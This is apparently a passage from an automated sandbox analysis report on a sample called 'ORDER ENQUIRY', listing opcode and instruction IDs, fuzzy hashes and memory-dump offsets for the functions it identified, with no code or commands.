                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5117cd48beebf7c7d533175a9fa9d053b49fa182150e08248400247f2961cee6
                                                                                                                                                                          • Instruction ID: f9fc6e26324f68dd98860424d1ee71133c2f5c3a077aa95fa97be11d7478c0e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 5117cd48beebf7c7d533175a9fa9d053b49fa182150e08248400247f2961cee6
                                                                                                                                                                          • Instruction Fuzzy Hash: 583104722056019FC329DF2DD880E26BBE9FB90360F0944AEE9958B355DB35EC40CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ba0abafeeebc895ca43e064ff40a4915255fc830214cb8936e7c9ea7e7d478cb
                                                                                                                                                                          • Instruction ID: d3fbcc592f3b80977e97a00ecc356fb1e73addb4932fdcf868c9f22ca7abf18a
                                                                                                                                                                          • Opcode Fuzzy Hash: ba0abafeeebc895ca43e064ff40a4915255fc830214cb8936e7c9ea7e7d478cb
                                                                                                                                                                          • Instruction Fuzzy Hash: D641BA71200B459FD726EF28C981BD67BE8AF48710F19846DF69A8B252C730E840CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 98e192756eca3fc161b8bbbe4a62e9e317a0b95f34b4f638c9ebe8bae658dec7
                                                                                                                                                                          • Instruction ID: 5de10049b25b5dc9e50800f0e8dc7ef65c8eb54aedc2308a4e95415781724df0
                                                                                                                                                                          • Opcode Fuzzy Hash: 98e192756eca3fc161b8bbbe4a62e9e317a0b95f34b4f638c9ebe8bae658dec7
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F31AD716046019FD328DF28C881A2ABBE9FB94720F0945ADF9959B398E734EC04CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 87e8f64d060ce657acae8f117e459f34bbcedaf9ede165fa7995e6b3467e09cf
                                                                                                                                                                          • Instruction ID: 9b447427e9cc29a2056023cde4025a81e340aac004985ab11bb572dcd02c56eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 87e8f64d060ce657acae8f117e459f34bbcedaf9ede165fa7995e6b3467e09cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 1331D4316016A29BF72A579ECA8CB557BD8FF44B40F1D44E4EA49DB6D1DB28D848C230
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e5f26ce685c4a52275ee2635dec711a4f9e1d13d1dcdef08395a25f46d04c679
                                                                                                                                                                          • Instruction ID: 09cb233eaf5d235dd84ec00d7115ca053a9ce21e1052804b426b4cf61bafb758
                                                                                                                                                                          • Opcode Fuzzy Hash: e5f26ce685c4a52275ee2635dec711a4f9e1d13d1dcdef08395a25f46d04c679
                                                                                                                                                                          • Instruction Fuzzy Hash: DD31C175A0061AEBEB19DF98CD40BAEB7B5FB48B40F4541A8E910EB244D770ED41CBA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 21f9e117b351fc3732b754dd0d2fec934ecf3103aee4b41730d998277aae7513
                                                                                                                                                                          • Instruction ID: eda013c3a14085aba0c361ca33d7b7ba74e7f93ec80f21d3b75a3146c2cb4b53
                                                                                                                                                                          • Opcode Fuzzy Hash: 21f9e117b351fc3732b754dd0d2fec934ecf3103aee4b41730d998277aae7513
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A315076A4012DABCF61DF58DD85BDEBBB9EB98350F1000E5A908A7250DB30DE918F90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2be5df44d1f56264a3da2576b89598dc478849ae9794be881559f8457c721145
                                                                                                                                                                          • Instruction ID: f045fdd10523f231bcd8156174a126c646ef5150d259be13771c82fecd5e5fdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 2be5df44d1f56264a3da2576b89598dc478849ae9794be881559f8457c721145
                                                                                                                                                                          • Instruction Fuzzy Hash: D031A972E00615EFDB21DFA9CD40AAEBBF9EF44750F118569E516EB250D770AE00CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: df45109af52007c141f01f18fc27a6437b7afd2fbb60f567ee03995ca4c724a6
                                                                                                                                                                          • Instruction ID: 7ad9c1232f84f36f48b3e2131f6fa4bc7a97d27ea696b584c12b246bd482721e
                                                                                                                                                                          • Opcode Fuzzy Hash: df45109af52007c141f01f18fc27a6437b7afd2fbb60f567ee03995ca4c724a6
                                                                                                                                                                          • Instruction Fuzzy Hash: FD31F471B00A06EFEB1A9FAAD840B6AB7F9EF44750F0040ADE515DB752DB70DC008B90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a5e305af1649759a18dc508c54ca5ef4d25bc15b3ddb2552a1b9122cb782add9
                                                                                                                                                                          • Instruction ID: 515b189de913bd4bb230e380c5f1b68042076e18f9dc6350f606521ba02bf3ac
                                                                                                                                                                          • Opcode Fuzzy Hash: a5e305af1649759a18dc508c54ca5ef4d25bc15b3ddb2552a1b9122cb782add9
                                                                                                                                                                          • Instruction Fuzzy Hash: 8F31F672A04782DBC723DE68CAC0AABBBB9AF94650F05452DFD55A7212DB30DD0187E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9fbf0de82dff354d25451fc2e2c3719f03be7c4ab1f0f233d921c7536793c968
                                                                                                                                                                          • Instruction ID: 2539827834354a7fad991c9a6f03b5143a72c0ec6ffb0d7157a841dd5f98f41f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fbf0de82dff354d25451fc2e2c3719f03be7c4ab1f0f233d921c7536793c968
                                                                                                                                                                          • Instruction Fuzzy Hash: 5531CC716083418FE324CF1DC884B6ABBE9FB98700F554AADF9889B355D374E904CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                          • Instruction ID: 130886a4c84bf780efd90bd13ab243a22f31c8065d7e4acd4bbef4826023a8eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                          • Instruction Fuzzy Hash: EF312CB2B00B11AFD765CF69CE44B57BBF8BB08B50F04052DE59AC3650E630E9008B60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 535454ebfef395395e783bc86a66152be061f6735a97b695147fbc864cc03c61
                                                                                                                                                                          • Instruction ID: fe294fd5e172f20629eb88ff8ead28d5b288c7b429a0f6e548fc9215e161a28b
                                                                                                                                                                          • Opcode Fuzzy Hash: 535454ebfef395395e783bc86a66152be061f6735a97b695147fbc864cc03c61
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D31BAB15093018FCB19DF19C640A6AFBF1FF89614F4449EEE8989B211D730DA44CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c2b624de2791c1d32c0609810d3e96b2c2cb653baef808151d6466520528ea5f
                                                                                                                                                                          • Instruction ID: a7fe1e19348b0bd60cfebb3896656cbf4c8c7efd9992f158534c2d2c075e253b
                                                                                                                                                                          • Opcode Fuzzy Hash: c2b624de2791c1d32c0609810d3e96b2c2cb653baef808151d6466520528ea5f
                                                                                                                                                                          • Instruction Fuzzy Hash: A13138B1B006058FDB24DFB8CA81AAEB7F9FF98304F04842AE116D3A55D730D981CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                          • Instruction ID: 3e2c5d8372d0560da987ce11361527cb8d3d5cc27d235d43efe2e048df302fc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                          • Instruction Fuzzy Hash: 87210432E4025AAAEB119FB9C840BFFBBB5EF14790F0584759E55E7380E370C90087A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a12bcc987e6bdf3e418c7f7c63e933e22718c65bde15af29cb905e2570249d14
                                                                                                                                                                          • Instruction ID: 004f74905d75b4738ee38ce096dccf772497dc540524db565b2240244498b398
                                                                                                                                                                          • Opcode Fuzzy Hash: a12bcc987e6bdf3e418c7f7c63e933e22718c65bde15af29cb905e2570249d14
                                                                                                                                                                          • Instruction Fuzzy Hash: 293149B15003018BDB26AFA8CC41BB97B74EF50714F9881E9E9459B3C2DB34D985CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                          • Instruction ID: 18b8ca7b6f16d66823cbbcd201e449c370c0a0a800e6703d5efdab91fdac1dd4
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 30212B36600652A6CF19EB958840ABABFB8EFA0750F40805EFAE587691E73CD950C760
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2bc87050c95744b88edbc769fba83095849cac1ead7bc44d8f59a09918452841
                                                                                                                                                                          • Instruction ID: 3b4077d2ee7287a3f5ba2cc857a327bdba7264ed9f37acc0044bd54c2c5fcf41
                                                                                                                                                                          • Opcode Fuzzy Hash: 2bc87050c95744b88edbc769fba83095849cac1ead7bc44d8f59a09918452841
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F31F431A0052D9BDB31DB28CD41FEEB7BDAB15740F4100A5E645A7291D771AE808FA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                          • Instruction ID: eea9a19d8f712d309b161befb859d74c12fffa8f28943e35125259a89a7862b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                          • Instruction Fuzzy Hash: 86219131A00609EBCB15DF58C984A8EBBF9FF4C714F108469EE25DB241D674EE058F90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 87b481c096ddb9ff77d08d86643afa317f3f2ed425512d1a179b69377ad95e88
                                                                                                                                                                          • Instruction ID: bfcf6fdc9ee084641fb078a2897375a7586fff68d609257b97f8db181c558397
                                                                                                                                                                          • Opcode Fuzzy Hash: 87b481c096ddb9ff77d08d86643afa317f3f2ed425512d1a179b69377ad95e88
                                                                                                                                                                          • Instruction Fuzzy Hash: 9721E1326047059BCB22DF68CA84B6B77E8FF8C720F054529FD589B641C734ED018BA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                          • Instruction ID: 45b16e7e04d1b7ec7a044c88737f85c2065ee8fe493c587dc6f22c2d1466d7da
                                                                                                                                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                          • Instruction Fuzzy Hash: B0319A31600604EFDB25CFA8C984F6AB7B9EF45354F1445A9E5128B281E734EE01CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 379f639dc154693a1b798f603faecc35ac20a9b711c3a7fb9235555ffdeb6a8e
                                                                                                                                                                          • Instruction ID: 21868b0697dfd429cdef92f19ce56d1183951a7ea888220f28a54608345262a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 379f639dc154693a1b798f603faecc35ac20a9b711c3a7fb9235555ffdeb6a8e
                                                                                                                                                                          • Instruction Fuzzy Hash: EC317C75600215DFCB2ACF1DC8849AEB7F6EF84304B194599F809AB391E771EA45CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 25b44963c1df974fc8ecdccfa5b23e53d2d57672604525af31c83013932845be
                                                                                                                                                                          • Instruction ID: dea33e1943897f87e5e14c424749d3b4b49520fd3c001deda44696d8a55ed136
                                                                                                                                                                          • Opcode Fuzzy Hash: 25b44963c1df974fc8ecdccfa5b23e53d2d57672604525af31c83013932845be
                                                                                                                                                                          • Instruction Fuzzy Hash: 16218071A0012AEBCF25DF59C981ABEB7F4FF48740B5100A9F541A7240D738AD52CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
                                                                                                                                                                          • Instruction ID: ac652f5a72d52b0ca964c3ad6583cbca0cfed64135593e75b66139f5b5d7902c
                                                                                                                                                                          • Opcode Fuzzy Hash: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
                                                                                                                                                                          • Instruction Fuzzy Hash: 23219C71600645AFDB15EBADC940F6AB7A8FF88740F1440A9F904D7691D734ED50CBA8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
                                                                                                                                                                          • Instruction ID: 5125f775416d10f29f0e17d88463181fe8893efe9bba6efbb8428e4fda8e33ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
                                                                                                                                                                          • Instruction Fuzzy Hash: A621D0729047469BD715EF69C984BABBBECEFD5640F08449ABD80C7251D730C918C7A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
                                                                                                                                                                          • Instruction ID: 232174eb6566855f3aa08429be70bce02c5495b2751ae0298ad590256faf618b
                                                                                                                                                                          • Opcode Fuzzy Hash: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
                                                                                                                                                                          • Instruction Fuzzy Hash: 04212331606AC19BE727673C8D44B283B94EF41B70F6A03E5FA219B6E2DB68D801C210
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
                                                                                                                                                                          • Instruction ID: 4c806f36d79557eb808d9f3e375df4ebc25c9fa39327b1b50270b99e36d5f769
                                                                                                                                                                          • Opcode Fuzzy Hash: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
                                                                                                                                                                          • Instruction Fuzzy Hash: D221AC792006119FCB29DF29C901B56B7F5FF08B04F1884ADE509CB761E371E846CB94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
                                                                                                                                                                          • Instruction ID: dd6cd53201ac8f3d9b343b4ef0077d4542f28e15762552c9581e1d8c0f9deb36
                                                                                                                                                                          • Opcode Fuzzy Hash: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E113A72380A11BFDB26A5749C41F2B769DDBE4B60F1000A8B708EB190EF78DC0187D5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
                                                                                                                                                                          • Instruction ID: 96af5e3d1af4b668081bf206a02379b199c6a6fd212ce8ff2548edfda2fa9b54
                                                                                                                                                                          • Opcode Fuzzy Hash: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
                                                                                                                                                                          • Instruction Fuzzy Hash: B921C6B1E00249ABDB24DFAED9819AEFBF8FF98710F10016EE505A7250D7709945CB54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                          • Instruction ID: 81e39039b98199623e746b54212991d334971bfce6e568fcf45ed262a749dce3
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B218E72A00209EFDF129F99CC40BAEBBB9EF48710F20845AF905A7251D734D950EB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                          • Instruction ID: e5a4c745ba1e1f696842ecce58c58220394e280672790d70ad3688f7fc7952f9
                                                                                                                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
